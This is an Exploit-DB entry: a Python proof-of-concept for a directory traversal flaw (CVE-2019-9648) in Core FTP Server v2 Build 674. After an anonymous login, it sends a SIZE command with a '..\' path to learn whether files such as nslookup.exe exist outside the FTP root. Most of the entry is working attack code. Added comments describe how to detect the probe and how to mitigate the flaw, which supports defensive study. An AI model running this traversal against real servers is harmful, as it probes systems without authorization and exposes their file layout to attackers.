Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal

EDB-ID:

46535




Platform:

Windows

Date:

2019-03-13


# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648


#!/usr/bin/python

import socket
import sys

########################################################
###########Set Variables For Script Here################

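# Inputs for the existence check. Further down the script concatenates them
# directly after the FTP verb: "SIZE" + local_disk_drive + path_traversal +
# file_to_look_for.

# Name of the file whose presence on the server is being tested.
file_to_look_for = "nslookup.exe"
# Drive prefix; the leading space separates the argument from the "SIZE" verb.
local_disk_drive = " C:"
# Every backslash is escaped explicitly. The original relied on Python passing
# unknown escapes such as "\." and "\W" through unchanged, which newer
# interpreters warn about. The resulting value is identical.
path_traversal = "\\..\\..\\..\\..\\..\\Windows\\System32\\"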

########################################################
# Cosmetic start-up banner (appears to spell the CVE id and an author credit
# in ASCII art). It is only written to stdout and has no effect on the
# network exchange that follows.
print ("""
         #####  #     # #######        #####    ###     #    #####         #####   #####  #        #####
         #     # #     # #             #     #  #   #   ##   #     #       #     # #     # #    #  #     #
         #       #     # #                   # #     # # #   #     #       #     # #       #    #  #     #
         #       #     # #####   #####  #####  #     #   #    ###### #####  ###### ######  #    #   #####
         #        #   #  #             #       #     #   #         #             # #     # ####### #     #
         #     #   # #   #             #        #   #    #   #     #       #     # #     #      #  #     #
          #####     #    #######       #######   ###   #####  #####         #####   #####       #   #####

          #######
          #       #    # #####  #       ####  # #####
          #        #  #  #    # #      #    # #   #
          #####     ##   #    # #      #    # #   #
          #         ##   #####  #      #    # #   #
          #        #  #  #      #      #    # #   #
          ####### #    # #      ######  ####  #   #

          #     #                                       ######         #     #    #
          #  #  # #####  # ##### ##### ###### #    #    #     # #   # ###    #   #  ###### #    # # #    #
          #  #  # #    # #   #     #   #      ##   #    #     #  # #   #     #  #   #      #    # # ##   #
          #  #  # #    # #   #     #   #####  # #  #    ######    #          ###    #####  #    # # # #  #
          #  #  # #####  #   #     #   #      #  # #    #     #   #    #     #  #   #      #    # # #  # #
          #  #  # #   #  #   #     #   #      #   ##    #     #   #   ###    #   #  #       #  #  # #   ##
           ## ##  #    # #   #     #   ###### #    #    ######    #    #     #    # ######   ##   # #    #

           ######
           #     #   ##   #    # #####    ##   #      #
           #     #  #  #  ##   # #    #  #  #  #      #
           ######  #    # # #  # #    # #    # #      #
           #   #   ###### #  # # #    # ###### #      #
           #    #  #    # #   ## #    # #    # #      #
           #     # #    # #    # #####  #    # ###### ######

           """)
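# Existence check for CVE-2019-9648: after an anonymous login the script sends
# a single SIZE command whose argument contains "..\" sequences, then reads the
# reply to see whether the server reported a size for a file outside the FTP root.
#
# Server-side view: the observable event is a SIZE command carrying "..\" in
# its argument, here from an anonymous session, so FTP command logging is the
# place to look for it. Running a vendor build that addresses CVE-2019-9648 and
# disabling anonymous login where it is not needed removes the exposure.
#
# Changes from the original listing: the socket is now actually closed (the
# original wrote `s.close` without calling it), unused locals are dropped, and
# a reply without a second token no longer raises IndexError.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Address and port of the test server (a private-range address in the original).
    s.connect(('192.168.0.4', 21))

    # Read the greeting, then log in as the anonymous user.
    s.recv(1024)
    s.send('USER anonymous\r\n')

    s.recv(1024)
    s.send('PASS anonymous\r\n')

    # Two reads follow the PASS command; presumably the tested server sends its
    # login reply in two segments. TODO confirm against the target build.
    s.recv(1024)
    s.recv(1024)
    s.send('SIZE' + local_disk_drive + path_traversal + file_to_look_for + '\r\n')
    result = s.recv(2048)

    # The reply is split on spaces and its second token is treated as the size.
    # Anything non-numeric, or a reply with no second token, counts as "not found".
    splitoutput = result.strip().split(' ')
    size_field = splitoutput[1] if len(splitoutput) > 1 else ''
    if unicode(size_field, 'utf-8').isnumeric():
        print("The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + size_field)
    else:
        print("The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect.")

    s.send('QUIT\r\n')
finally:
    # Always release the control connection, including on errors above.
    s.close()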